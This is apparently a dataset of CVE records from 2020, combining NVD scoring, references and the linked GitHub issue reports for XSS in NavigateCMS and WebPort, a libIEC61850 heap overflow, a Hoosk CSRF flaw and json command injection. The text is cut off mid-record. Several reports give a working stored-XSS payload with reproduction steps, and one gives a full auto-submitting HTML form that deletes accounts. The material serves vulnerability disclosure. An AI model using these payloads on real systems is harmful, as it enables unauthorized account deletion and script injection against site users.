{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/Describe the bug/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Configuration" feature Navigate **/To Reproduce/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to '/navigate/navigate.php?fid=about' 3. Go to Moudle "Configuration" 4. Chose: - Go to "/navigate/navigate.php?fid=users" - Go to "/navigate/navigate.php?fid=profiles" - Go to "/navigate/navigate.php?fid=menus" - Go to "/navigate/navigate.php?fid=functions" - Go to "/navigate/navigate.php?fid=backups" 5. Click "Create" >> Insert Payload: '><details/open/ontoggle=confirm(1337)> 6. Save: XSS alert Message! **/Expected behavior/** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **/Impact/** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **/Screenshots/** Info NavigateCMS 2.9: ![info](https://user-images.githubusercontent.com/62001260/84911834-e76d0300-b0e2-11ea-8141-89682943eb25.PNG) Ex1: Chose go to "/navigate/navigate.php?fid=users" ![user](https://user-images.githubusercontent.com/62001260/84912586-c6f17880-b0e3-11ea-9851-7ee45dc8e39e.PNG) ![user1](https://user-images.githubusercontent.com/62001260/84912603-c9ec6900-b0e3-11ea-83f2-4998fff406ab.PNG) Ex2: Chose go to "/navigate/navigate.php?fid=profiles" ![profile](https://user-images.githubusercontent.com/62001260/84912828-0a4be700-b0e4-11ea-8b9d-9fbeb7727f2b.PNG) ![profile1](https://user-images.githubusercontent.com/62001260/84912841-0d46d780-b0e4-11ea-9449-d6ad40ddafb8.PNG) Ex3: Chose go to "/navigate/navigate.php?fid=menus" ![menu](https://user-images.githubusercontent.com/62001260/84913062-4b43fb80-b0e4-11ea-87bb-d4a157b4e2d7.PNG) ![menu1](https://user-images.githubusercontent.com/62001260/84913072-4e3eec00-b0e4-11ea-8537-01adb7eb24f5.PNG) Ex4: Chose go to "/navigate/navigate.php?fid=functions" ![fuction](https://user-images.githubusercontent.com/62001260/84913675-f9e83c00-b0e4-11ea-804e-00172edf8061.PNG) ![function1](https://user-images.githubusercontent.com/62001260/84913749-0cfb0c00-b0e5-11ea-8e9b-372ccf464412.PNG) Ex5: Chose go to "/navigate/navigate.php?fid=backups" ![backup](https://user-images.githubusercontent.com/62001260/84914144-7aa73800-b0e5-11ea-901e-0d93cb5b9a6f.PNG) ![Backup1](https://user-images.githubusercontent.com/62001260/84914158-7ed35580-b0e5-11ea-95ef-2baf0de4cd65.PNG) **/Desktop (please complete the following information):/** OS: Windows Browser: All **_I Hope you fix it ASAP_**
Cross Site Script Vulnerability on module "Configuration" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/11/comments
2
2020-06-17T14:57:52Z
2020-06-18T08:07:44Z
https://github.com/NavigateCMS/Navigate-CMS/issues/11
640,511,844
11
1,407
CVE-2020-23656
2020-08-26T17:15:12.833
NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Content."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**/Describe the bug/** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Content" feature Navigate **/To Reproduce/** Steps to reproduce the behavior: 1. Login into the panel 2. Go to 'navigate/navigate.php?fid=dashboard' 3. Go to Moudle "Content" 4. Chose: - Go to "/navigate/navigate.php?fid=blocks" - Go to "/navigate/navigate.php?fid=files" - Go to "/navigate/navigate.php?fid=comments" 5. Click "Create" >> Insert Payload: '><details/open/ontoggle=confirm(1337)> 6. Save: XSS alert Message! **/Expected behavior/** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **/Impact/** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **/Screenshots/** Info NavigateCMS 2.9: ![info](https://user-images.githubusercontent.com/62001260/84915796-754aed00-b0e7-11ea-9360-3382af7e0b14.PNG) Ex1: Chose go to "/navigate/navigate.php?fid=blocks" ![block](https://user-images.githubusercontent.com/62001260/84916120-dbd00b00-b0e7-11ea-8ef7-bc874ff178c8.PNG) ![block1](https://user-images.githubusercontent.com/62001260/84916139-e094bf00-b0e7-11ea-9c55-9c64fd353c3a.PNG) Ex2: Chose go to "/navigate/navigate.php?fid=files" ![folder](https://user-images.githubusercontent.com/62001260/84916350-2d789580-b0e8-11ea-873d-7850815867f9.PNG) ![folder1](https://user-images.githubusercontent.com/62001260/84916369-323d4980-b0e8-11ea-9880-99d20c40a0be.PNG) Ex3: Chose go to "/navigate/navigate.php?fid=comments" ![comment](https://user-images.githubusercontent.com/62001260/84916550-6add2300-b0e8-11ea-8e28-ff1776dc7bfd.PNG) ![comment1](https://user-images.githubusercontent.com/62001260/84916573-6fa1d700-b0e8-11ea-92ee-24c2da5f9907.PNG) **/Desktop (please complete the following information):/** OS: Windows Browser: All **_I Hope you fix it ASAP_**
Cross Site Script Vulnerability on module "Content" in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/12/comments
2
2020-06-17T15:28:13Z
2020-06-18T09:46:57Z
https://github.com/NavigateCMS/Navigate-CMS/issues/12
640,536,183
12
1,408
CVE-2020-15158
2020-08-26T18:15:10.287
In libIEC61850 before version 1.4.3, when a message with COTP message length field with value < 4 is received an integer underflow will happen leading to heap buffer overflow. This can cause an application crash or on some platforms even the execution of remote code. If your application is used in open networks or there are untrusted nodes in the network it is highly recommend to apply the patch. This was patched with commit 033ab5b. Users of version 1.4.x should upgrade to version 1.4.3 when available. As a workaround changes of commit 033ab5b can be applied to older versions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.3, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/commit/033ab5b6488250c8c3b838f25a7cbc3e099230bb" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/250" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/security/advisories/GHSA-pq77-fmf7-hjw8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/commit/033ab5b6488250c8c3b838f25a7cbc3e099230bb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/250" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/security/advisories/GHSA-pq77-fmf7-hjw8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E993B84-2A79-45F0-BF40-4AF97ACF6F3D", "versionEndExcluding": "1.4.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "191" ]
191
https://github.com/mz-automation/libiec61850/issues/250
[ "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
COTP message is size field set to zero can cause invalid memory access.
Possible heap buffer overflow when COTP message with invalid size is received
https://api.github.com/repos/mz-automation/libiec61850/issues/250/comments
2
2020-08-12T05:23:33Z
2020-08-27T10:16:25Z
https://github.com/mz-automation/libiec61850/issues/250
677,394,865
250
1,409
CVE-2020-23659
2020-08-26T18:15:10.427
WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webport:web_port:1.19.17121:*:*:*:*:*:*:*", "matchCriteriaId": "B90234D9-7BEB-4185-88B9-6CB1CF4A9E8C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "connections" feature. **To Reproduce** Steps to reproduce the behavior: 1, Login into the panel 2. Go to '/access/setup?type=conn' 3. Change connections 4. Insert Payload: '><details/open/ontoggle=confirm(1337)> 5. XSS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. Info WebPort-v1.19.17121 ![info](https://user-images.githubusercontent.com/62001260/85356530-5f9b5480-b539-11ea-8523-dfe46933b663.PNG) 2. Insert payload ![info](https://user-images.githubusercontent.com/62001260/85356571-7b9ef600-b539-11ea-9db9-a4d6553a5560.PNG) 3. xss alert mess ![Capture1](https://user-images.githubusercontent.com/62001260/85356604-8eb1c600-b539-11ea-89f9-2e77d6932dd2.PNG) **Desktop (please complete the following information):** OS: Windows Browser Chorme Version: Version 83.0.4103.106
Cross Site Script Vulnerability on "connections" in WebPort-v1.19.17121
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/1/comments
0
2020-06-23T03:11:09Z
2020-09-01T08:47:37Z
https://github.com/r0ck3t1973/xss_payload/issues/1
643,495,077
1
1,410
CVE-2020-16610
2020-08-28T17:15:12.043
Hoosk Codeigniter CMS before 1.7.2 is affected by a Cross Site Request Forgery (CSRF). When an attacker induces authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/pull/56" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hoosk:hoosk:*:*:*:*:*:*:*:*", "matchCriteriaId": "B8C02AC7-3B66-4B8A-BEBA-40E9E1CB97FA", "versionEndExcluding": "1.7.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/havok89/Hoosk/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "havok89", "Hoosk" ]
Hi,bro.I also find an csrf issue in admin page. When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention. how to reproduce the issue. 1. Login to admin page.(/admin) 2. Keep login and access the html it has following content ```html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST"> <input type="hidden" name="deleteid" value="userid" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` userid is very easy to guess. 3.And account userid = `userid` is delete without admin user's intention. how to fix this issue. set csrf token to protect delete function.
CSRF issue that allows attacker to delete an account
https://api.github.com/repos/havok89/Hoosk/issues/53/comments
2
2020-04-12T01:21:37Z
2020-05-08T04:19:22Z
https://github.com/havok89/Hoosk/issues/53
598,385,822
53
1,411
CVE-2020-7712
2020-08-30T08:15:11.900
This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trentm/json/issues/144" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trentm/json/pull/145" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r37c0e1807da7ff2bdd028bbe296465a6bbb99e2320dbe661d5d8b33b%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r3b04f4e99a19613f88ae088aa18cd271231a3c79dfff8f5efa8cda61%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r5f17bfca1d6e7f4b33ae978725b2fd62a9f1b3111696eafa9add802d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r8d2e174230f6d26e16c007546e804c343f1f68956f526daaafa4aaae%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r977a907ecbedf87ae5ba47d4c77639efb120f74d4d1b3de14a4ef4da%40%3Cissues.flink.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/r9c6d28e5b9a9b3481b7d1f90f1c2f75cd1a5ade91038426e0fb095da%40%3Cdev.flink.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/ra890c24b3d90be36daf48ae76b263acb297003db24c1122f8e4aaef2%40%3Cissues.flink.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rb023d54a46da1ac0d8969097f5fecc79636b07d3b80db7b818a5c55c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rb2b981912446a74e14fe6076c4b7c7d8502727ea0718e6a65a9b1be5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rb89bd82dffec49f83b49e9ad625b1b63a408b3c7d1a60d6f049142a0%40%3Cissues.flink.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rba7ea4d75d6a8e5b935991d960d9b893fd30e576c4d3b531084ebd7d%40%3Cissues.flink.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rd9b9cc843f5cf5b532bdad9e87a817967efcf52b917e8c43b6df4cc7%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/rec8bb4d637b04575da41cfae49118e108e95d43bfac39b7b698ee4db%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.apache.org/thread.html/ree3abcd33c06ee95ab59faa1751198a1186d8941ddc2c2562c12966c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-608932" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-608931" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSON-597481" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trentm/json/issues/144" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trentm/json/pull/145" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r37c0e1807da7ff2bdd028bbe296465a6bbb99e2320dbe661d5d8b33b%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r3b04f4e99a19613f88ae088aa18cd271231a3c79dfff8f5efa8cda61%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r5f17bfca1d6e7f4b33ae978725b2fd62a9f1b3111696eafa9add802d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r8d2e174230f6d26e16c007546e804c343f1f68956f526daaafa4aaae%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r977a907ecbedf87ae5ba47d4c77639efb120f74d4d1b3de14a4ef4da%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9c6d28e5b9a9b3481b7d1f90f1c2f75cd1a5ade91038426e0fb095da%40%3Cdev.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra890c24b3d90be36daf48ae76b263acb297003db24c1122f8e4aaef2%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb023d54a46da1ac0d8969097f5fecc79636b07d3b80db7b818a5c55c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb2b981912446a74e14fe6076c4b7c7d8502727ea0718e6a65a9b1be5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb89bd82dffec49f83b49e9ad625b1b63a408b3c7d1a60d6f049142a0%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rba7ea4d75d6a8e5b935991d960d9b893fd30e576c4d3b531084ebd7d%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd9b9cc843f5cf5b532bdad9e87a817967efcf52b917e8c43b6df4cc7%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rec8bb4d637b04575da41cfae49118e108e95d43bfac39b7b698ee4db%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ree3abcd33c06ee95ab59faa1751198a1186d8941ddc2c2562c12966c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-608932" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-608931" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-JSON-597481" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" 